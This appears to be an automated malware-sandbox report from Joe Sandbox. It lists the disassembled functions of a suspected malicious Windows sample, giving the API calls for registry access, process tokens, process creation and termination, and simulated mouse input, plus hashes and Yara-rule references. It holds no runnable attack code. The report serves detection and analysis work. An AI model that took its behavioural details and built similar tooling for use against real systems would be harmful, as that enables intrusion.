API String ID: 3489934621-340411864
Opcode ID: 82692b45a2ad83bdcb3eed46fd94c47e73a7ce9865ee29f2d781fb2bfb481044
Instruction ID: 190f794e2465d8a104bac39c334ed90c090fe71e1244442c40edfa008504d51a
Opcode Fuzzy Hash: 82692b45a2ad83bdcb3eed46fd94c47e73a7ce9865ee29f2d781fb2bfb481044
Instruction Fuzzy Hash: DDE0E571A90701BFEB90ABF8EC4DB483A64BB14B06F604B24F501E90F0DBB5449A8F00

Function 00A1428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A141A8), ref: 00A142A8
GetProcAddress.KERNEL32(00000000), ref: 00A142AF
EncodePointer.KERNEL32(00000000), ref: 00A142BA
DecodePointer.KERNEL32(00A141A8), ref: 00A142D5

Strings

combase.dll, xrefs: 00A142A3
RoUninitialize, xrefs: 00A14297

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: d732f8d263be35ef420cc388b29bf813a4608b571a6706ed7278a16e2da88596
Instruction ID: b6a6344d62a576487871b90dad012f98b9312aced5832b689b32056ff0c40484
Opcode Fuzzy Hash: d732f8d263be35ef420cc388b29bf813a4608b571a6706ed7278a16e2da88596
Instruction Fuzzy Hash: 68E09271950B00ABEB91EBF9BD0DF843A68BB04B42F504B14F101E91B1CBB4458A8B10

Function 009F218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 009F21B8
GetWindowRect.USER32(?,?), ref: 009F21F9
ScreenToClient.USER32(?,?), ref: 009F2221
GetClientRect.USER32(?,?), ref: 009F2350
GetWindowRect.USER32(?,?), ref: 009F2369

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: c2349a298f8ca0176e3fa088d67c3d0e7cd02c5e8231f4f5b9b9d40b204fbe6f
Instruction ID: c461aa608d03654ed5be28cfdd3709be0a42fba3b72f753a0e19259c504c3ce6
Opcode Fuzzy Hash: c2349a298f8ca0176e3fa088d67c3d0e7cd02c5e8231f4f5b9b9d40b204fbe6f
Instruction Fuzzy Hash: E7B18C79A10249DBCF14CFA8C5807EDB7B1FF08710F148529EE59AB254EB74AA40CB64

Function 00A56A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A56BC6
_memmove.LIBCMT ref: 00A56B01

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

_memmove.LIBCMT ref: 00A56B74
_memmove.LIBCMT ref: 00A56C5B
_memmove.LIBCMT ref: 00A56C74
_memmove.LIBCMT ref: 00A56C90

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 688e6c6c124e9ae0a8ba251e21ed6ba9a33d7dbe6b3c421d6bca86e0985a3d28
Instruction ID: 977ebf35d2f7c54cfe99726aa2f32f324785b89878e78833fc08fd601c8ef43e
Opcode Fuzzy Hash: 688e6c6c124e9ae0a8ba251e21ed6ba9a33d7dbe6b3c421d6bca86e0985a3d28
Instruction Fuzzy Hash: EB61AD3050029AABCF11EF60CD82EFE37A8BF49309F454559FE996B192DB34AD49CB50

Function 00A70844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A7147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A7040D,?,?), ref: 00A71491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00A70980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00A709A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00A709EC
RegCloseKey.ADVAPI32(00000000), ref: 00A709F9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: f2b1be2354b3099d2902afa7eb57e13d95a4b58802f557bf43d336f90687360a
Instruction ID: 37038610ccfc855b072b23d7f23c4a7598e94274c3edaf5401c5508b2cf7fb4c
Opcode Fuzzy Hash: f2b1be2354b3099d2902afa7eb57e13d95a4b58802f557bf43d336f90687360a
Instruction Fuzzy Hash: F5514871208244AFD714EB64CD85EABBBF9FF88314F04891DF589872A2DB31E905CB52

Function 00A75DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00A75E38
GetMenuItemCount.USER32(00000000), ref: 00A75E6F
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00A75E97
GetMenuItemID.USER32(?,?), ref: 00A75F06
GetSubMenu.USER32(?,?), ref: 00A75F14
PostMessageW.USER32(?,00000111,?,00000000), ref: 00A75F65

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 2c84fc7835980aeb41d7124fd0bb9056e08342e41e213cf68c3ea5e85107ae1d
Instruction ID: 2f6e7a902ec853099204c69e84523aa0c69b70599e95e283139e399ac50bb19a
Opcode Fuzzy Hash: 2c84fc7835980aeb41d7124fd0bb9056e08342e41e213cf68c3ea5e85107ae1d
Instruction Fuzzy Hash: 1051AF35E00619AFCF11EFA4CD41AAEB7B5EF48310F118069F905BB391CB70AE418B90

Function 00A4F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A4F6A2
VariantClear.OLEAUT32(00000013), ref: 00A4F714
VariantClear.OLEAUT32(00000000), ref: 00A4F76F
_memmove.LIBCMT ref: 00A4F799
VariantClear.OLEAUT32(?), ref: 00A4F7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A4F814

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 0cb205126e23bb191b03fefdefb242534ec83441f1d2bb082c05beb44c15fa33
Instruction ID: fd7d17957f3e2c04354899a4202f2588f1fe8cea797eb9cace72e8f5a1a164f3
Opcode Fuzzy Hash: 0cb205126e23bb191b03fefdefb242534ec83441f1d2bb082c05beb44c15fa33
Instruction Fuzzy Hash: 05512D79A00209EFDB14CF58C884AAAB7B8FF8C354B15856AE959DB304D734E951CF90

Function 00A529B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A529FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A52A4A
IsMenu.USER32(00000000), ref: 00A52A6A
CreatePopupMenu.USER32 ref: 00A52A9E
GetMenuItemCount.USER32(000000FF), ref: 00A52AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00A52B2D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 75999cce8f38dc0a74d400bc0c138571fb7a8c1bc699956861b0f4c16d43d683
Instruction ID: c95a60cd7dc91bb3fb6b74ec9519226824892ae6dad4c311a891fcd4b48b279d
Opcode Fuzzy Hash: 75999cce8f38dc0a74d400bc0c138571fb7a8c1bc699956861b0f4c16d43d683
Instruction Fuzzy Hash: F151BD70A0020ADFDF25CF68C888BAEBBF5BF56315F104119EC119B2A1E7B09E49CB51

Function 009F1B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

BeginPaint.USER32(?,?,?,?,?,?), ref: 009F1B76
GetWindowRect.USER32(?,?), ref: 009F1BDA
ScreenToClient.USER32(?,?), ref: 009F1BF7
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009F1C08
EndPaint.USER32(?,?), ref: 009F1C52

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: cbc2e1fe0137d2999f546dc3c7d2b5070f50baa4b4599227f81507314d9eff31
Instruction ID: fefffe1eb99ee2a6571eb1665e14fad56194cae0f2c541b57ccf96cfaf973fb0
Opcode Fuzzy Hash: cbc2e1fe0137d2999f546dc3c7d2b5070f50baa4b4599227f81507314d9eff31
Instruction Fuzzy Hash: 4D41D230104304EFD711DF64DC88FBA7BE8EB95360F140669FA99872B2C7719846DBA1

Function 00A7BD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00AB77B0,00000000,01026058,?,?,00AB77B0,?,00A7BC1A,?,?), ref: 00A7BD84
EnableWindow.USER32(?,00000000), ref: 00A7BDA8
ShowWindow.USER32(00AB77B0,00000000,01026058,?,?,00AB77B0,?,00A7BC1A,?,?), ref: 00A7BE08
ShowWindow.USER32(?,00000004,?,00A7BC1A,?,?), ref: 00A7BE1A
EnableWindow.USER32(?,00000001), ref: 00A7BE3E
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00A7BE61

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: e66395d29f21b6d3fc006005fff71984709ecd50af3b157456241db77007029b
Instruction ID: 0cdcaefa65ff2b0b8d9e8d396f9389f49950c958ab8dc186dcca5822ffc2a46e
Opcode Fuzzy Hash: e66395d29f21b6d3fc006005fff71984709ecd50af3b157456241db77007029b
Instruction Fuzzy Hash: 45413B74610144AFDB22CF68C889BD57BE1BF09314F18C1A9FA4C8F2A2C771AC56CB61

Function 00A67788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00A6550C,?,?,00000000,00000001), ref: 00A67796

Part of subcall function 00A6406C: GetWindowRect.USER32(?,?), ref: 00A6407F

GetDesktopWindow.USER32 ref: 00A677C0
GetWindowRect.USER32(00000000), ref: 00A677C7
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00A677F9

Part of subcall function 00A557FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A55877

GetCursorPos.USER32(?), ref: 00A67825
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00A67883

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 619c896c6d70f0658bce01ddd94f4cee6b0c5d929122d19718cfa26a0ada6b2d
Instruction ID: 164842f90073475bdca333b2571273b9c086647f65776a14270afabec509abd0
Opcode Fuzzy Hash: 619c896c6d70f0658bce01ddd94f4cee6b0c5d929122d19718cfa26a0ada6b2d
Instruction Fuzzy Hash: DB31B072508305ABD720DF64D849F9FB7A9FF88314F000929F599A7191DB70ED49CBA2

Function 00A49431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A48CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A48CDE
Part of subcall function 00A48CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A48CE8
Part of subcall function 00A48CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A48CF7
Part of subcall function 00A48CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A48CFE
Part of subcall function 00A48CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A48D14

GetLengthSid.ADVAPI32(?,00000000,00A4904D), ref: 00A49482
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A4948E
HeapAlloc.KERNEL32(00000000), ref: 00A49495
CopySid.ADVAPI32(00000000,00000000,?), ref: 00A494AE
GetProcessHeap.KERNEL32(00000000,00000000,00A4904D), ref: 00A494C2
HeapFree.KERNEL32(00000000), ref: 00A494C9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 122726d466011b7fe9f30f7cf1d1037857e3d02263e240b172d01f51de1e2d3f
Instruction ID: 54499977dbd6fe6bec84517d74379a584acb5780ba6a586cfeb4130e79ebebb7
Opcode Fuzzy Hash: 122726d466011b7fe9f30f7cf1d1037857e3d02263e240b172d01f51de1e2d3f
Instruction Fuzzy Hash: 8D11A936601604EFDB50DFA4CC49FAFBBB9FB85326F108158E84697250C73AA916CB60

Function 00A491CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A49200
OpenProcessToken.ADVAPI32(00000000), ref: 00A49207
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A49216
CloseHandle.KERNEL32(00000004), ref: 00A49221
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A49250
DestroyEnvironmentBlock.USERENV(00000000), ref: 00A49264

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0ea7ff5f6f8589c258c23d96b1cc7bfe5a52893173df48764da6ce3cf5a39400
Instruction ID: 605fcd1095c6915c10a13654131da3088c7c578aea5dc83835218cce517873fe
Opcode Fuzzy Hash: 0ea7ff5f6f8589c258c23d96b1cc7bfe5a52893173df48764da6ce3cf5a39400
Instruction Fuzzy Hash: 8211447650120AABDF41CFE8ED49FDB7BA9EF88304F044124FA04A2160C2729E65EB60

Function 00A4C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00A4C34E
GetDeviceCaps.GDI32(00000000,00000058), ref: 00A4C35F
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A4C366
ReleaseDC.USER32(00000000,00000000), ref: 00A4C36E
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A4C385
MulDiv.KERNEL32(000009EC,?,?), ref: 00A4C397

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f6098253693208e76202a681fefc8ead7d26658118baf2e635428eafd5630a92
Instruction ID: 8a80d2cb3743b53c93b8732840aa28dada24454752ee048eb93cc2b1794b691a
Opcode Fuzzy Hash: f6098253693208e76202a681fefc8ead7d26658118baf2e635428eafd5630a92
Instruction Fuzzy Hash: 25012175E01218BBEB509BE59D49E5EBFB8EF88761F004065FA08AB290D6709915CFA0

Function 00A7C552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 009F16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009F1729
Part of subcall function 009F16CF: SelectObject.GDI32(?,00000000), ref: 009F1738
Part of subcall function 009F16CF: BeginPath.GDI32(?), ref: 009F174F
Part of subcall function 009F16CF: SelectObject.GDI32(?,00000000), ref: 009F1778

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00A7C57C
LineTo.GDI32(00000000,00000003,?), ref: 00A7C590
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00A7C59E
LineTo.GDI32(00000000,00000000,?), ref: 00A7C5AE
EndPath.GDI32(00000000), ref: 00A7C5BE
StrokePath.GDI32(00000000), ref: 00A7C5CE

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 10267a4c6182254f67e39ca97dfc1fca601f9665f8488b9fbba7cd8286050fb9
Instruction ID: 5697fab632c9cb79fffe64509635d58e805164429c96ba1f9bfe77d13e585998
Opcode Fuzzy Hash: 10267a4c6182254f67e39ca97dfc1fca601f9665f8488b9fbba7cd8286050fb9
Instruction Fuzzy Hash: CA110C7204010DBFDB129F90DC88FAA7F6DEF04364F048155BA185A1A1C771AD59DBA0

Function 00A107BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A107EC
MapVirtualKeyW.USER32(00000010,00000000), ref: 00A107F4
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A107FF
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A1080A
MapVirtualKeyW.USER32(00000011,00000000), ref: 00A10812
MapVirtualKeyW.USER32(00000012,00000000), ref: 00A1081A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 2f283a9c96f7cce34acf41a3a3afa2e24890953b56b2d1d767d17f1c6b01a7b3
Instruction ID: 9fe1ed234991cfc2d3486a4a4850af1fcea8ce191eb2d528518d2ba132414f5e
Opcode Fuzzy Hash: 2f283a9c96f7cce34acf41a3a3afa2e24890953b56b2d1d767d17f1c6b01a7b3
Instruction Fuzzy Hash: F0016CB09017597DE3008F5A8C85B53FFA8FF59354F00411BA15C47941C7F5A868CBE5

Function 00A559A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A559B4
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A559CA
GetWindowThreadProcessId.USER32(?,?), ref: 00A559D9
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A559E8
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A559F2
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A559F9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
